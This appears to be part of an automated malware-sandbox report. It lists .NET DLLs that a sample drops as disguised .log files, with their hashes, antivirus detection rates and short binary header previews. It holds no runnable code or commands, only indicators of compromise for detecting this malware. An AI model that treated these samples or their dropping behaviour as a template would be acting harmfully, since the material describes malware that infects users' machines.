Entropy (8bit):	5.631194486392901
Encrypted:	false
SSDEEP:	384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
MD5:	D8BF2A0481C0A17A634D066A711C12E9
SHA1:	7CC01A58831ED109F85B64FE4920278CEDF3E38D
SHA-256:	2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
SHA-512:	7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 24%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............\|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\GZjfleQD.log

Download File

Process:	C:\Users\user\Desktop\k1iZHyRK6K.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	9728
Entropy (8bit):	5.0168086460579095
Encrypted:	false
SSDEEP:	96:b2+4Af/qPl98sgn8VenjzRR0xXzhZ7BiCTUk9v2G6/7jK6XsBG7hWuP9LfqpW0RQ:gCU8XKb7BDUieGi3jcBgLyB+b
MD5:	69546E20149FE5633BCBA413DC3DC964
SHA1:	29FEB42AB8B563FAFACFD27FAE48D4019A4CBCC2
SHA-256:	B48CA16B9BA2B44BF13051705B8E12D587D80262F57F7B2595AD1DD7854A86C6
SHA-512:	90D5F6C334B8064ED6DD002B03C57CEBBFAC1620D6CB2B79103DB0369D3A4FD82DB092E675F387AB0BDFE20303D9AC37F4E150896FC333E6F83B00269F012236
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 4%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......e...........!.................=... ...@....... ....................................@..................................<..W....@.......................`....................................................... ............... ..H............text...4.... ...................... ..`.rsrc........@....... ..............@..@.reloc.......`.......$..............@..B.................=......H.......<&.............................................................................................................V...}..................0..C.......(....o.......(....(....o.......(....s......(...........o....o.......0..'.......s.......(....o.....o........,..o......*..................0.............{........&.r...p.{....r;..p(....}.....s....}.....{........[.{.....{....o....(....s....rQ..po.....{.....{....o....(....s....ra..po......{....s....}.....{..........+.{.....{..

C:\Users\user\Desktop\HeuFlNGE.log

Download File

Process:	C:\Users\user\Desktop\k1iZHyRK6K.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	33792
Entropy (8bit):	5.541771649974822
Encrypted:	false
SSDEEP:	768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
MD5:	2D6975FD1CC3774916D8FF75C449EE7B
SHA1:	0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
SHA-256:	75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
SHA-512:	6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 38%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....\|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...\|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\IAvfBIwS.log

Download File

Process:	C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	69632
Entropy (8bit):	5.932541123129161
Encrypted:	false
SSDEEP:	1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
MD5:	F4B38D0F95B7E844DD288B441EBC9AAF
SHA1:	9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
SHA-256:	AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
SHA-512:	2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: ReversingLabs, Detection: 17%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

C:\Users\user\Desktop\KGHfuADJ.log

Download File

Process:	C:\Users\user\Desktop\k1iZHyRK6K.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	85504
Entropy (8bit):	5.8769270258874755
Encrypted:	false
SSDEEP:	1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
MD5:	E9CE850DB4350471A62CC24ACB83E859
SHA1:	55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
SHA-256:	7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
SHA-512:	9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 71%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

C:\Users\user\Desktop\LcDwYjoO.log

Download File

Process:	C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	32256
Entropy (8bit):	5.631194486392901
Encrypted:	false
SSDEEP:	384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
MD5:	D8BF2A0481C0A17A634D066A711C12E9
SHA1:	7CC01A58831ED109F85B64FE4920278CEDF3E38D
SHA-256:	2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
SHA-512:	7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 24%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............\|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\QPVuBgDD.log

Download File

Process:	C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	85504
Entropy (8bit):	5.8769270258874755
Encrypted:	false
SSDEEP:	1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
MD5:	E9CE850DB4350471A62CC24ACB83E859
SHA1:	55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
SHA-256:	7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
SHA-512:	9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 71%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

C:\Users\user\Desktop\WHyUeLIr.log

Download File

Process:	C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	23552
Entropy (8bit):	5.519109060441589
Encrypted:	false
SSDEEP:	384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
MD5:	0B2AFABFAF0DD55AD21AC76FBF03B8A0
SHA1:	6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
SHA-256:	DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
SHA-512:	D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 8%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\XgAKFRwS.log

Download File

Process:	C:\Users\user\Desktop\k1iZHyRK6K.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	22016
Entropy (8bit):	5.41854385721431
Encrypted:	false
SSDEEP:	384:8Np+VQupukpNURNzOLn7TcZ64vTUbqryealcpA2:bPpu0NyzOL0ZJ4bavae
MD5:	BBDE7073BAAC996447F749992D65FFBA
SHA1:	2DA17B715689186ABEE25419A59C280800F7EDDE
SHA-256:	1FAE639DF1C497A54C9F42A8366EDAE3C0A6FEB4EB917ECAD9323EF8D87393E8
SHA-512:	0EBDDE3A13E3D27E4FFDAF162382D463D8F7E7492B7F5C52D3050ECA3E6BD7A58353E8EC49524A9601CDF8AAC18531F77C2CC6F50097D47BE55DB17A387621DF
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 4%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...)..d...........!.....N...........l... ........@.. ..............................R.....@..................................l..O.................................................................................... ............... ..H............text....M... ...N.................. ..`.rsrc................P..............@..@.reloc...............T..............@..B.................l......H........L..............lL..H....................................................................................................................................................................lsx)T.,.....h.)................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\YSUUeens.log

Download File

Process:	C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	9728
Entropy (8bit):	5.0168086460579095
Encrypted:	false
SSDEEP:	96:b2+4Af/qPl98sgn8VenjzRR0xXzhZ7BiCTUk9v2G6/7jK6XsBG7hWuP9LfqpW0RQ:gCU8XKb7BDUieGi3jcBgLyB+b
MD5:	69546E20149FE5633BCBA413DC3DC964
SHA1:	29FEB42AB8B563FAFACFD27FAE48D4019A4CBCC2
SHA-256:	B48CA16B9BA2B44BF13051705B8E12D587D80262F57F7B2595AD1DD7854A86C6
SHA-512:	90D5F6C334B8064ED6DD002B03C57CEBBFAC1620D6CB2B79103DB0369D3A4FD82DB092E675F387AB0BDFE20303D9AC37F4E150896FC333E6F83B00269F012236
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 4%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......e...........!.................=... ...@....... ....................................@..................................<..W....@.......................`....................................................... ............... ..H............text...4.... ...................... ..`.rsrc........@....... ..............@..@.reloc.......`.......$..............@..B.................=......H.......<&.............................................................................................................V...}..................0..C.......(....o.......(....(....o.......(....s......(...........o....o.......0..'.......s.......(....o.....o........,..o......*..................0.............{........&.r...p.{....r;..p(....}.....s....}.....{........[.{.....{....o....(....s....rQ..po.....{.....{....o....(....s....ra..po......{....s....}.....{..........+.{.....{..

C:\Users\user\Desktop\YlLkFAlS.log

Download File

Process:	C:\Users\user\Desktop\k1iZHyRK6K.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	69632
Entropy (8bit):	5.932541123129161
Encrypted:	false
SSDEEP:	1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
MD5:	F4B38D0F95B7E844DD288B441EBC9AAF
SHA1:	9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
SHA-256:	AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
SHA-512:	2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: ReversingLabs, Detection: 17%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

C:\Users\user\Desktop\aMXlVeRh.log

Download File

Process:	C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	85504
Entropy (8bit):	5.8769270258874755
Encrypted:	false
SSDEEP:	1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
MD5:	E9CE850DB4350471A62CC24ACB83E859
SHA1:	55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
SHA-256:	7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
SHA-512:	9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 71%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

C:\Users\user\Desktop\bnPvHrDf.log

Download File

Process:	C:\Users\user\Desktop\k1iZHyRK6K.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	23552
Entropy (8bit):	5.519109060441589
Encrypted:	false
SSDEEP:	384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
MD5:	0B2AFABFAF0DD55AD21AC76FBF03B8A0
SHA1:	6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
SHA-256:	DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
SHA-512:	D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 8%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\cbCbMxmL.log

Download File

Process:	C:\Users\user\Desktop\k1iZHyRK6K.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	32256
Entropy (8bit):	5.631194486392901
Encrypted:	false
SSDEEP:	384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
MD5:	D8BF2A0481C0A17A634D066A711C12E9
SHA1:	7CC01A58831ED109F85B64FE4920278CEDF3E38D
SHA-256:	2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
SHA-512:	7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 24%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............\|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\eUUurwLd.log

Download File

Process:	C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	23552
Entropy (8bit):	5.519109060441589
Encrypted:	false
SSDEEP:	384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
MD5:	0B2AFABFAF0DD55AD21AC76FBF03B8A0
SHA1:	6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
SHA-256:	DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
SHA-512:	D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 8%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\fHYCcKHb.log

Download File

Process:	C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	32256
Entropy (8bit):	5.631194486392901
Encrypted:	false
SSDEEP:	384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
MD5:	D8BF2A0481C0A17A634D066A711C12E9
SHA1:	7CC01A58831ED109F85B64FE4920278CEDF3E38D
SHA-256:	2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
SHA-512:	7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 24%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............\|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\fzpjyagV.log

Download File

Process:	C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	9728
Entropy (8bit):	5.0168086460579095
Encrypted:	false
SSDEEP:	96:b2+4Af/qPl98sgn8VenjzRR0xXzhZ7BiCTUk9v2G6/7jK6XsBG7hWuP9LfqpW0RQ:gCU8XKb7BDUieGi3jcBgLyB+b
MD5:	69546E20149FE5633BCBA413DC3DC964
SHA1:	29FEB42AB8B563FAFACFD27FAE48D4019A4CBCC2
SHA-256:	B48CA16B9BA2B44BF13051705B8E12D587D80262F57F7B2595AD1DD7854A86C6
SHA-512:	90D5F6C334B8064ED6DD002B03C57CEBBFAC1620D6CB2B79103DB0369D3A4FD82DB092E675F387AB0BDFE20303D9AC37F4E150896FC333E6F83B00269F012236
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 4%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......e...........!.................=... ...@....... ....................................@..................................<..W....@.......................`....................................................... ............... ..H............text...4.... ...................... ..`.rsrc........@....... ..............@..@.reloc.......`.......$..............@..B.................=......H.......<&.............................................................................................................V...}..................0..C.......(....o.......(....(....o.......(....s......(...........o....o.......0..'.......s.......(....o.....o........,..o......*..................0.............{........&.r...p.{....r;..p(....}.....s....}.....{........[.{.....{....o....(....s....rQ..po.....{.....{....o....(....s....ra..po......{....s....}.....{..........+.{.....{..

C:\Users\user\Desktop\gvcKOXDZ.log

Download File

Process:	C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	33792
Entropy (8bit):	5.541771649974822
Encrypted:	false
SSDEEP:	768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
MD5:	2D6975FD1CC3774916D8FF75C449EE7B
SHA1:	0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
SHA-256:	75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
SHA-512:	6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 38%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....\|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...\|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\hKLkytLW.log

Download File

Process:	C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	33792
Entropy (8bit):	5.541771649974822
Encrypted:	false
SSDEEP:	768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
MD5:	2D6975FD1CC3774916D8FF75C449EE7B
SHA1:	0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
SHA-256:	75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
SHA-512:	6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 38%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....\|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...\|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\iLMKqBdM.log

Download File

Process:	C:\Users\user\Desktop\k1iZHyRK6K.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	9728
Entropy (8bit):	5.0168086460579095
Encrypted:	false
SSDEEP:	96:b2+4Af/qPl98sgn8VenjzRR0xXzhZ7BiCTUk9v2G6/7jK6XsBG7hWuP9LfqpW0RQ:gCU8XKb7BDUieGi3jcBgLyB+b
MD5:	69546E20149FE5633BCBA413DC3DC964
SHA1:	29FEB42AB8B563FAFACFD27FAE48D4019A4CBCC2
SHA-256:	B48CA16B9BA2B44BF13051705B8E12D587D80262F57F7B2595AD1DD7854A86C6
SHA-512:	90D5F6C334B8064ED6DD002B03C57CEBBFAC1620D6CB2B79103DB0369D3A4FD82DB092E675F387AB0BDFE20303D9AC37F4E150896FC333E6F83B00269F012236
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 4%
